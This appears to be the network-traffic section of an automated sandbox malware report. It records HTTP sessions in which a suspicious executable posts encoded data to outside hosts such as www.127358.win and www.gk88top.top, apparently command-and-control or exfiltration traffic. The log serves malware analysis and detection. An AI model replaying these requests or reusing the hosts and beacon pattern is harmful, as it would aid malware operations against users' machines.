                                                          Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.1049977172.67.137.47806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:32:25.916013002 CET1873OUTPOST /vjnn/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.gk88top.top
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1229
                                                          Cache-Control: no-cache
                                                          Origin: http://www.gk88top.top
                                                          Referer: http://www.gk88top.top/vjnn/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Raw: 57 4c 74 48 3d 79 2f 6e 62 66 36 6c 43 7a 71 65 75 4a 53 63 6d 58 2b 6d 38 2f 2f 66 4f 44 67 42 63 75 6b 32 55 39 39 72 39 62 71 35 4f 57 78 6e 52 2f 71 52 39 4f 69 6c 6f 69 2f 64 57 35 59 6f 53 70 62 37 59 78 78 45 72 63 57 5a 48 77 66 71 2f 41 4c 4f 32 42 35 63 73 38 46 68 37 6f 42 52 51 6d 73 50 6c 46 68 45 4a 7a 61 33 68 41 5a 69 72 77 75 71 62 39 5a 78 6e 78 4f 4e 51 56 36 42 61 56 6d 75 53 55 62 5a 6e 54 50 5a 4e 4c 61 55 58 38 52 61 44 72 45 42 42 6c 61 68 43 4f 64 54 79 75 35 7a 57 30 4c 67 43 59 69 64 7a 56 65 66 33 2b 4e 30 47 41 30 53 50 6a 31 48 73 38 37 37 76 33 48 42 30 41 76 31 33 37 67 41 2b 47 39 38 62 54 4d 2b 77 58 6c 76 47 52 51 79 54 6b 2b 4b 4c 74 32 43 50 7a 48 4a 59 36 62 45 45 61 2f 49 65 43 76 78 69 61 31 59 55 46 45 4a 70 45 64 6c 4c 59 4f 6e 36 47 36 30 59 4c 76 68 54 76 33 56 61 75 67 62 55 46 6e 6d 50 67 70 6d 66 53 55 47 2b 41 61 41 69 79 58 7a 71 54 4c 34 63 73 6a 54 44 31 46 50 4c 32 32 6c 4b 77 55 37 43 6c 48 73 58 43 45 58 32 42 31 68 47 4a 35 64 77 67 46 57 6a 46 [TRUNCATED]
                                                          Data Ascii: WLtH=y/nbf6lCzqeuJScmX+m8//fODgBcuk2U99r9bq5OWxnR/qR9Oiloi/dW5YoSpb7YxxErcWZHwfq/ALO2B5cs8Fh7oBRQmsPlFhEJza3hAZirwuqb9ZxnxONQV6BaVmuSUbZnTPZNLaUX8RaDrEBBlahCOdTyu5zW0LgCYidzVef3+N0GA0SPj1Hs877v3HB0Av137gA+G98bTM+wXlvGRQyTk+KLt2CPzHJY6bEEa/IeCvxia1YUFEJpEdlLYOn6G60YLvhTv3VaugbUFnmPgpmfSUG+AaAiyXzqTL4csjTD1FPL22lKwU7ClHsXCEX2B1hGJ5dwgFWjFMnt2iPE9YxRvvDQZkhUb+B/V/4eLA7IhrgFQ5bLCgTm+8TC4z7Mn7XVpCfnjsJ9xIMJB+a1o4C6V0nu5dr2/XTVZsFkOU44Av0SIgzWB76ASkYQc3mAH2BA36nKDaS047jPGmuW+TZI61YFb7PtS1n/boeiYqkTvLdp1XqzA9kFzU0k/5MkdtnDB6L8RgMyWBVZ2i5HbOl7xGFmF6S1fIfozJL8ncVVUBBodhQuVve55w7NnYF0FN+87VtA0UYuygz64xG2V+IL9PZL38EoHlKB6cQ5s6gIZlf21mm/Pit7Lhez84t8bTiRD6n299ffXU7XXEoVZAd4VN0zXeokNfo+D1UgXlhqLliBwApf8SzkhDllUlTfTO42Z8qi/xkvSiqR8M0al22k3wgiKThTGVMiWS9W7U54HuD+WLHZO5/FraLod7kvSau8++IQqFCYojzZl3ZS5bsSONpOis1DAthhyxRY1xHTdMXLRuMyXuOaHSQoT3SaH6Eg7GbbXf5D8JPNEGmCdgTmxs+oqlbZOJI5+XcPlNuKgHXeh/fXJ4nnFF9lXMrOtlrpVmRVWV6itTGJhSgTS4oD0JnGM/AiMqNcsHlM7y1uCeth/V71pyjF9NA+RgoV2KpiFapPMr1pArTyg8kW00F2cu0smBFWpwN2cMaW8BDBrw4 [TRUNCATED]
                                                          Jan 11, 2025 03:32:26.971700907 CET967INHTTP/1.1 404 Not Found
                                                          Date: Sat, 11 Jan 2025 02:32:26 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oElepLcww0bT6vSsBAYuZmSBfA6vcTe67EQuvQQ7Rt40GJHsMKw5E9Kw4uEm5S%2FIixodfDMaPy2wWK0WTV5C8Kiu96aNsxsB25OpXhQHv0P1Zi2n4tBCTd42Y7K0WZNlxjY%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 90017f0c993042ac-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1766&min_rtt=1766&rtt_var=883&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1873&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.1049979172.67.137.47806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:32:28.464070082 CET580OUTGET /vjnn/?WLtH=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH1FtKgHUps+jxIjoel/WuIa3Au8OorA==&W0-=CzJDBfQxOTFPL HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.gk88top.top
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Jan 11, 2025 03:32:29.533134937 CET1236INHTTP/1.1 404 Not Found
                                                          Date: Sat, 11 Jan 2025 02:32:29 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RWJ7RYcwmQkKmK8PW0xudB3EKyR77NkIT5YfdVVVtmgDj8SvW1PXGgdyY4RdIjpirHvpkfZW5mmI%2FHtIwQJidUWKxK3%2BQBOuIsxei3Brb5GSEAkyLUjKSN74EWeMSRXhyHM%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 90017f1cad897cae-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1878&min_rtt=1878&rtt_var=939&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=580&delivery_rate=0&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                          Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly
                                                          Jan 11, 2025 03:32:29.533154011 CET90INData Raw: 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d
                                                          Data Ascii: error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.1049980206.238.89.119806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:32:34.921533108 CET833OUTPOST /2mep/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.127358.win
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 193
                                                          Cache-Control: no-cache
                                                          Origin: http://www.127358.win
                                                          Referer: http://www.127358.win/2mep/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Raw: 57 4c 74 48 3d 64 75 54 39 51 54 4f 2b 39 35 78 65 38 44 6a 6e 6f 62 4d 75 69 6f 6c 36 49 4c 70 7a 32 4f 4d 66 30 49 4d 53 78 2b 65 6a 6a 74 4c 4e 72 56 35 2b 57 62 6f 51 36 39 41 72 4b 6d 70 63 44 4e 48 36 6e 2f 7a 4c 45 36 66 77 62 4a 70 71 61 75 30 6f 4c 69 54 51 37 50 46 73 7a 34 46 6e 45 4c 2b 43 75 31 2b 44 52 76 74 45 51 54 51 43 38 65 6b 39 55 41 53 73 4b 4d 66 6c 76 66 52 4e 75 4f 31 71 65 4a 66 39 75 61 6f 32 51 75 47 70 30 44 2b 59 71 58 75 72 49 4c 41 45 2b 4b 2b 2b 78 35 74 43 6a 4e 41 31 54 62 43 51 53 54 54 31 7a 52 71 33 4f 74 46 63 70 41 4f 73 78 35 2b 6f
                                                          Data Ascii: WLtH=duT9QTO+95xe8DjnobMuiol6ILpz2OMf0IMSx+ejjtLNrV5+WboQ69ArKmpcDNH6n/zLE6fwbJpqau0oLiTQ7PFsz4FnEL+Cu1+DRvtEQTQC8ek9UASsKMflvfRNuO1qeJf9uao2QuGp0D+YqXurILAE+K++x5tCjNA1TbCQSTT1zRq3OtFcpAOsx5+o


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.1049981206.238.89.119806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:32:37.470510006 CET857OUTPOST /2mep/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.127358.win
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 217
                                                          Cache-Control: no-cache
                                                          Origin: http://www.127358.win
                                                          Referer: http://www.127358.win/2mep/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Raw: 57 4c 74 48 3d 64 75 54 39 51 54 4f 2b 39 35 78 65 38 69 54 6e 37 4d 51 75 6b 49 6c 39 57 62 70 7a 34 65 4d 62 30 49 41 53 78 38 7a 6f 69 66 76 4e 73 30 4a 2b 48 76 63 51 33 64 41 72 53 32 70 64 64 39 48 48 6e 2f 2f 31 45 37 6a 77 62 4e 4a 71 61 75 45 6f 4c 52 4c 66 34 2f 46 35 37 59 46 70 62 37 2b 43 75 31 2b 44 52 76 35 2b 51 58 38 43 38 75 55 39 57 68 53 6a 41 73 66 6d 73 66 52 4e 34 4f 31 75 65 4a 66 62 75 62 45 63 51 6f 4b 70 30 42 32 59 71 47 75 6f 43 4c 41 43 6a 36 2f 39 67 34 77 6e 76 76 59 4f 58 4a 71 6c 49 52 4c 49 35 51 58 77 66 38 6b 4c 36 33 53 69 2f 2f 4c 43 6a 59 47 4c 73 39 4e 4e 6a 67 77 4e 36 39 71 69 67 71 4e 55 2f 51 3d 3d
                                                          Data Ascii: WLtH=duT9QTO+95xe8iTn7MQukIl9Wbpz4eMb0IASx8zoifvNs0J+HvcQ3dArS2pdd9HHn//1E7jwbNJqauEoLRLf4/F57YFpb7+Cu1+DRv5+QX8C8uU9WhSjAsfmsfRN4O1ueJfbubEcQoKp0B2YqGuoCLACj6/9g4wnvvYOXJqlIRLI5QXwf8kL63Si//LCjYGLs9NNjgwN69qigqNU/Q==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.1049982206.238.89.119806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:32:40.026175976 CET1870OUTPOST /2mep/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.127358.win
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1229
                                                          Cache-Control: no-cache
                                                          Origin: http://www.127358.win
                                                          Referer: http://www.127358.win/2mep/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Raw: 57 4c 74 48 3d 64 75 54 39 51 54 4f 2b 39 35 78 65 38 69 54 6e 37 4d 51 75 6b 49 6c 39 57 62 70 7a 34 65 4d 62 30 49 41 53 78 38 7a 6f 69 66 6e 4e 73 47 42 2b 56 34 41 51 32 64 41 72 62 57 70 51 64 39 48 57 6e 2f 6e 78 45 37 75 46 62 4c 46 71 62 4e 4d 6f 44 41 4c 66 6a 50 46 35 33 34 46 6f 45 4c 2b 58 75 31 76 72 52 76 70 2b 51 58 38 43 38 73 4d 39 53 77 53 6a 47 73 66 6c 76 66 51 43 75 4f 31 47 65 4a 47 67 75 62 77 6d 54 59 71 70 78 52 6d 59 6c 55 32 6f 41 72 41 41 69 36 2f 66 67 34 38 30 76 76 45 6f 58 4e 71 62 49 53 72 49 31 6b 53 66 48 73 6b 41 76 68 4b 52 2b 38 6e 61 68 75 43 37 31 4f 30 47 73 6c 59 79 71 4f 4c 65 6c 65 67 35 72 4d 61 61 69 57 70 31 6f 37 7a 4c 7a 62 44 6e 36 4a 77 78 64 6f 56 45 4f 59 35 55 44 2b 32 51 6f 33 72 68 31 45 31 61 77 77 6f 6d 49 59 65 52 66 44 4b 56 67 35 4b 6b 66 6d 57 47 73 79 74 54 68 45 44 6c 71 51 57 67 41 4b 32 5a 67 76 69 66 35 70 45 58 6a 6f 2f 34 4c 49 74 58 6f 73 46 67 51 74 4b 37 2b 46 6b 44 39 66 2b 34 5a 78 39 58 72 70 68 36 68 56 4b 35 4f 4d 63 54 7a [TRUNCATED]
                                                          Data Ascii: WLtH=duT9QTO+95xe8iTn7MQukIl9Wbpz4eMb0IASx8zoifnNsGB+V4AQ2dArbWpQd9HWn/nxE7uFbLFqbNMoDALfjPF534FoEL+Xu1vrRvp+QX8C8sM9SwSjGsflvfQCuO1GeJGgubwmTYqpxRmYlU2oArAAi6/fg480vvEoXNqbISrI1kSfHskAvhKR+8nahuC71O0GslYyqOLeleg5rMaaiWp1o7zLzbDn6JwxdoVEOY5UD+2Qo3rh1E1awwomIYeRfDKVg5KkfmWGsytThEDlqQWgAK2Zgvif5pEXjo/4LItXosFgQtK7+FkD9f+4Zx9Xrph6hVK5OMcTzRge4GruFIdyfzCWNwT5onehJTsuSyY/PzN/HGOa1Q44LWq35wy8sYL/lSvJ9MYs0UJnNae//tYbh9mX9pMp4eqIQdRQ0uSNj0jwtnWtlYBAcDehSv/d/VUsmM6X5sag1VqzkyECW8V2yHi9MzUiUmMYCaG4rMfgWAjAKfpMR+eNCyxiXsm05GPYpT5jfnUzlXXrbf1vDeEz1UxDft9uDprgYj7pZcCqaxpC9jygY+IP1ByHpOTY8yTgVtBtQBjGLdTN2B4x6R6mgioBvKYNlAlD815dOTG6QNQK8i1kyEcISLdJV+8s1P+rRkIa2qjG8MzOg8YN/te0nx54AXvi6zXsL1eGLqGbdcSX2Qh8DACZPZyPv8vhNiyTFQWsVK5fx43tmA+g80tsfNtbgGjLCyBdss/qC9hscUDEVWvXIrIC8XIAq+3a+/UHwhZlnxnDP20Hk5jnYwerJCsRbaUD4hw38KV0KfuQFYZsavlTXK1YIpdSQnpCv6dp3kH8aoMKTaYqtgURbqvsgRaSBLC1SUQxsUQF0toMPNomQFom2MMlvUkNbC3uI5VVGeP2EbkREOJnfj8Ex76SVcwGenIzLLB/Q3zdZKYev5Hek3f3RY1F5SqHxOdGjds3xtxHIBi+cFGdz5hlScyewvvG0U9Ujvm1OhVTT2KQqZA [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.1049983206.238.89.119806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:32:42.646234989 CET579OUTGET /2mep/?WLtH=Qs7dTkG74ZlbzDPIks80sLprU65g+bEtyeoxhvOotfrZ9WhcV54Y9rQsYH5lTs77muDKHbL5HIFuHfk3BCfdn4oV88xJK42NkH/MJMBzZ1962N0iLw==&W0-=CzJDBfQxOTFPL HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.127358.win
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.104998466.29.149.46806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:33:09.042598009 CET851OUTPOST /cnve/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.infohive.website
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 193
                                                          Cache-Control: no-cache
                                                          Origin: http://www.infohive.website
                                                          Referer: http://www.infohive.website/cnve/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Raw: 57 4c 74 48 3d 37 58 72 79 54 6f 73 31 30 52 71 57 6b 44 64 5a 65 30 37 36 5a 34 74 2b 51 70 44 6b 59 63 36 44 6a 72 36 32 49 56 4d 38 76 69 48 37 67 5a 51 52 52 57 52 53 54 66 65 4e 4d 52 68 55 61 58 48 6b 61 63 41 64 6f 6e 47 74 4a 76 56 61 36 73 4a 57 63 38 42 51 46 58 77 74 56 31 61 57 31 74 50 57 64 61 6f 39 4a 52 42 76 74 74 46 56 50 53 35 56 72 6e 65 76 6d 39 46 73 55 75 58 2b 78 62 33 76 69 6b 62 62 54 64 69 7a 31 6f 6b 71 4e 6e 76 68 58 76 4f 71 4e 51 55 52 4f 61 65 65 47 42 7a 33 4d 70 71 75 31 76 4e 66 31 45 4b 37 67 70 6f 44 6a 5a 42 61 54 4c 35 64 48 31 50 33
                                                          Data Ascii: WLtH=7XryTos10RqWkDdZe076Z4t+QpDkYc6Djr62IVM8viH7gZQRRWRSTfeNMRhUaXHkacAdonGtJvVa6sJWc8BQFXwtV1aW1tPWdao9JRBvttFVPS5Vrnevm9FsUuX+xb3vikbbTdiz1okqNnvhXvOqNQUROaeeGBz3Mpqu1vNf1EK7gpoDjZBaTL5dH1P3


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.104998566.29.149.46806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:33:11.594050884 CET875OUTPOST /cnve/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.infohive.website
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 217
                                                          Cache-Control: no-cache
                                                          Origin: http://www.infohive.website
                                                          Referer: http://www.infohive.website/cnve/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Raw: 57 4c 74 48 3d 37 58 72 79 54 6f 73 31 30 52 71 57 6e 6a 74 5a 4e 44 6e 36 53 34 74 78 56 70 44 6b 52 38 37 49 6a 72 2b 32 49 55 35 6b 73 51 54 37 6e 37 49 52 51 54 39 53 55 66 65 4e 55 42 68 56 48 48 48 5a 61 63 4d 56 6f 6d 71 74 4a 76 42 61 36 70 74 57 63 50 35 50 58 33 77 76 64 56 61 55 2f 4e 50 57 64 61 6f 39 4a 52 56 4a 74 72 74 56 50 69 70 56 6b 6d 65 73 6c 39 46 6a 43 2b 58 2b 6d 72 33 6a 69 6b 61 4d 54 63 2f 6f 31 72 63 71 4e 6d 66 68 58 39 6d 70 44 51 56 59 54 4b 66 58 4f 55 43 64 50 4a 43 48 74 75 30 66 6f 6e 6e 54 6a 49 56 45 79 49 67 4e 41 38 6c 54 4a 7a 36 64 64 4e 46 6b 6d 44 42 41 76 72 45 79 6d 31 55 62 73 64 44 63 73 41 3d 3d
                                                          Data Ascii: WLtH=7XryTos10RqWnjtZNDn6S4txVpDkR87Ijr+2IU5ksQT7n7IRQT9SUfeNUBhVHHHZacMVomqtJvBa6ptWcP5PX3wvdVaU/NPWdao9JRVJtrtVPipVkmesl9FjC+X+mr3jikaMTc/o1rcqNmfhX9mpDQVYTKfXOUCdPJCHtu0fonnTjIVEyIgNA8lTJz6ddNFkmDBAvrEym1UbsdDcsA==
                                                          Jan 11, 2025 03:33:12.188391924 CET637INHTTP/1.1 404 Not Found
                                                          Date: Sat, 11 Jan 2025 02:33:12 GMT
                                                          Server: Apache
                                                          Content-Length: 493
                                                          Connection: close
                                                          Content-Type: text/html
